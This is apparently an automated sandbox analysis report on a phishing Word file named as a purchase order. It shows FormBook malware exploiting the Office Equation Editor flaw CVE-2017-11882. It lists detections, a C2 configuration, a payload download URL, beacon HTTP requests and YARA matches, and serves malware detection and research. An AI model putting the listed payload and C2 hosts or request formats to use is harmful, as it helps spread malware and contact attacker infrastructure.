Windows Analysis Report RFQ9003930 New Order.doc

Overview

General Information

Sample Name: RFQ9003930 New Order.doc
Analysis ID: 491362
MD5: 514ab9ff13f08e764db59c3a79d95771
SHA1: 33b2aee2f0e57a080eb6711591e4e38e9324621c
SHA256: 286151dbc2feace2a895ff2b71cc0f7e46708aedc8ca16d6a86ba283c5dcdf21
Tags: doc, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Office equation editor drops PE file
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

Found malware configuration
Source: 00000004.00000002.438341359.0000000003221000.00000004.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.eastwestasia-thailand.com/hht8/"], "decoy": ["chenghuaikj.com", "lovegames.site", "namalon.com", "ltxxiu.com", "yaotiaoshiguang.top", "serversshipping.com", "animationwageshare.com", "rh-et.com", "cutepets1.com", "chantforpeace.com", "techmazakatta.com", "amoorelive.com", "bisexualnft.com", "k5truckingexpress.com", "6e1eturzmu9ustbnrfe2404.com", "allday.coach", "prettyrisque.com", "stripeer.com", "ktranspass.com", "salinibros.com", "alzayantourism.com", "vilitex.com", "c10todkqnmixtkwzw2xq.pro", "alicama.com", "lyssna-miss.xyz", "vinoonline.cloud", "ip-15-235-154.net", "mylinkedbook.com", "sugarbombed.com", "blufftonga.com", "discocl.xyz", "conversationaldatacloud.com", "chancebig190.xyz", "empoweringcommunityrewards.com", "yournfts.one", "shopskinara.com", "zoltun.design", "mightyasianfood.com", "kingtreemusic.com", "kle638ske.com", "fsfurnitureking.com", "pl-id86979577.xyz", "hollandmediapromotion.com", "tansx.top", "ig-businessverifyaccount.com", "btcwpg.com", "eagles5050.com", "simplyblessedcrafts.com", "bestjob.solutions", "cikgu-alirays.xyz", "ceasa.club", "boutiques333.com", "sherwoodmastiff.com", "zljrsy.com", "tuberbytes.com", "gentciu.com", "lax2k.com", "hotelsanfelipeycasinos.com", "pungentvrtwan.xyz", "plein-exclusive.com", "juliareda.xyz", "tasq.digital", "spdrum.com", "anartravertine.com"]}
Multi AV Scanner detection for submitted file
Source: RFQ9003930 New Order.doc Virustotal: Detection: 28%
Source: RFQ9003930 New Order.doc ReversingLabs: Detection: 28%
Yara detected FormBook
Source: Yara match File source: 00000006.00000000.459016681.0000000009613000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.477117043.0000000000360000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.687693280.00000000001B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.687716035.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.438341359.0000000003221000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.469103907.0000000009613000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.476999679.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.687654604.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.477135735.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://lg-tv.tk/harshmanzx.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: lg-tv.tk Virustotal: Detection: 15%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\harshmanzx[1].exe ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe ReversingLabs: Detection: 28%
Antivirus or Machine Learning detection for unpacked file
Source: 5.2.hasmenhtk721.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.hasmenhtk721.exe.516810.2.unpack Avira: Label: TR/ATRAPS.Gen
Source: 5.2.hasmenhtk721.exe.30000.0.unpack Avira: Label: TR/ATRAPS.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\hasmenhtk721.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb source: hasmenhtk721.exe, rundll32.exe
Source: Binary string: rundll32.pdb source: hasmenhtk721.exe, 00000005.00000002.477204185.0000000000504000.00000004.00000020.sdmp

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: lg-tv.tk
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 4x nop then jmp 020B9F29h 4_2_020B9144
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 4x nop then jmp 020B9F29h 4_2_020B9EB0
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 185.239.243.112:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 185.239.243.112:80

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.ceasa.club
Source: C:\Windows\explorer.exe Network Connect: 166.62.10.138 80
Source: C:\Windows\explorer.exe Domain query: www.eastwestasia-thailand.com
Source: C:\Windows\explorer.exe Domain query: www.alzayantourism.com
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.215 80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.eastwestasia-thailand.com/hht8/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-26496-GO-DADDY-COM-LLCUS
Source: Joe Sandbox View ASN Name: CLOUDIE-AS-APCloudieLimitedHK
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /hht8/?3f_l=DUjZaEEJGHk2mIYyRTWCDvfPYGXyJA+p9CnlV/1lDuzycvHeDg3jgt8DWF0RM29KScOphA==&e6-0=cZQH7dS HTTP/1.1 Host: www.ceasa.club Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hht8/?3f_l=kMYE47A9Ipt2JQtPCSStI6O3jSMpHsULQE7+uza83sv6yxZmMge2O0x1IBVpwyYq5aFQXg==&e6-0=cZQH7dS HTTP/1.1 Host: www.alzayantourism.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.239.243.112
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx Date: Mon, 27 Sep 2021 12:10:55 GMT Content-Type: application/x-msdownload Content-Length: 860672 Last-Modified: Mon, 27 Sep 2021 01:40:53 GMT Connection: keep-alive ETag: "61512125-d2200" Accept-Ranges: bytes
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /harshmanzx.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: lg-tv.tk Connection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 27 Sep 2021 12:12:38 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: explorer.exe, 00000006.00000000.522105380.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000006.00000000.465400053.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.522105380.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.522105380.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.460037596.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000006.00000000.452961390.0000000002CC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.688172525.0000000000907000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.452961390.0000000002CC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.688172525.0000000000907000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000006.00000000.521205855.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.463735774.0000000003E50000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.452961390.0000000002CC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.688172525.0000000000907000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.524424919.000000000449C000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.465121306.000000000457A000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.443465852.0000000003D90000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico%SP&
Source: explorer.exe, 00000006.00000000.465400053.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.465400053.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.452961390.0000000002CC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.688172525.0000000000907000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000006.00000000.521205855.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.460037596.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000006.00000000.465400053.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.522105380.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.452961390.0000000002CC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.688172525.0000000000907000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.465400053.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.526196234.0000000006998000.00000004.00000001.sdmp String found in binary or memory: http://www.mozilla.com0
Source: explorer.exe, 00000006.00000000.443465852.0000000003D90000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehpP
Source: explorer.exe, 00000006.00000000.443465852.0000000003D90000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehpp7P&
Source: explorer.exe, 00000006.00000000.443465852.0000000003D90000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: explorer.exe, 00000006.00000000.522105380.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.524779925.000000000457A000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.524779925.000000000457A000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: hasmenhtk721.exe, hasmenhtk721.exe, 00000005.00000002.477585914.0000000000BB2000.00000020.00020000.sdmp, rundll32.exe, 00000007.00000002.689308196.000000000297F000.00000004.00020000.sdmp String found in binary or memory: http://www.rspb.org.uk/wildlife/birdguide/name/
Source: rundll32.exe, 00000007.00000002.687912548.0000000000720000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.443465852.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.456117807.00000000044E7000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: explorer.exe, 00000006.00000000.524604112.0000000004513000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
Source: explorer.exe, 00000006.00000000.465258321.00000000045D4000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
Source: explorer.exe, 00000006.00000000.468389644.000000000840D000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1enu
Source: explorer.exe, 00000006.00000000.460037596.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000006.00000000.460037596.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000006.00000000.460037596.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{78388EE1-378B-4475-870B-E925774DE169}.tmp
Source: unknown DNS traffic detected: queries for: lg-tv.tk

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000006.00000000.459016681.0000000009613000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.477117043.0000000000360000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.687693280.00000000001B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.687716035.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.438341359.0000000003221000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.469103907.0000000009613000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.476999679.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.687654604.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.477135735.0000000000400000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000006.00000000.459016681.0000000009613000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.459016681.0000000009613000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.477117043.0000000000360000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.477117043.0000000000360000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.687693280.00000000001B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.687693280.00000000001B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.687716035.00000000001E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.687716035.00000000001E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.438341359.0000000003221000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.438341359.0000000003221000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.469103907.0000000009613000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.469103907.0000000009613000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.476999679.00000000000F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.476999679.00000000000F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.687654604.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.687654604.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.477135735.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.477135735.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\harshmanzx[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\hasmenhtk721.exe
.NET source code contains very large strings
Source: harshmanzx[1].exe.2.dr, Darwin.WindowsForm/SearchResults.cs Long String: Length: 34816
Source: hasmenhtk721.exe.2.dr, Darwin.WindowsForm/SearchResults.cs Long String: Length: 34816
Source: 4.0.hasmenhtk721.exe.bb0000.0.unpack, Darwin.WindowsForm/SearchResults.cs Long String: Length: 34816
Source: 4.2.hasmenhtk721.exe.bb0000.2.unpack, Darwin.WindowsForm/SearchResults.cs Long String: Length: 34816
Source: 5.0.hasmenhtk721.exe.bb0000.0.unpack, Darwin.WindowsForm/SearchResults.cs Long String: Length: 34816
Source: 5.2.hasmenhtk721.exe.bb0000.3.unpack, Darwin.WindowsForm/SearchResults.cs Long String: Length: 34816
Yara signature match
Source: 00000006.00000000.459016681.0000000009613000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.459016681.0000000009613000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.477117043.0000000000360000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.477117043.0000000000360000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.687693280.00000000001B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.687693280.00000000001B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.687716035.00000000001E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.687716035.00000000001E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.438341359.0000000003221000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.438341359.0000000003221000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.469103907.0000000009613000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.469103907.0000000009613000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.476999679.00000000000F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.476999679.00000000000F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.687654604.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.687654604.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.477135735.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.477135735.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 4_2_003969C9 4_2_003969C9
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 4_2_00396D30 4_2_00396D30
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 4_2_003990B0 4_2_003990B0
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 4_2_0039B381 4_2_0039B381
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 4_2_020B5B90 4_2_020B5B90
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 4_2_020B0048 4_2_020B0048
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 4_2_003900F0 4_2_003900F0
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_0040102E 5_2_0040102E
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00401030 5_2_00401030
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_0041DAD8 5_2_0041DAD8
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_0041ED7F 5_2_0041ED7F
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00402D87 5_2_00402D87
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00402D90 5_2_00402D90
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00409E50 5_2_00409E50
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_0041D630 5_2_0041D630
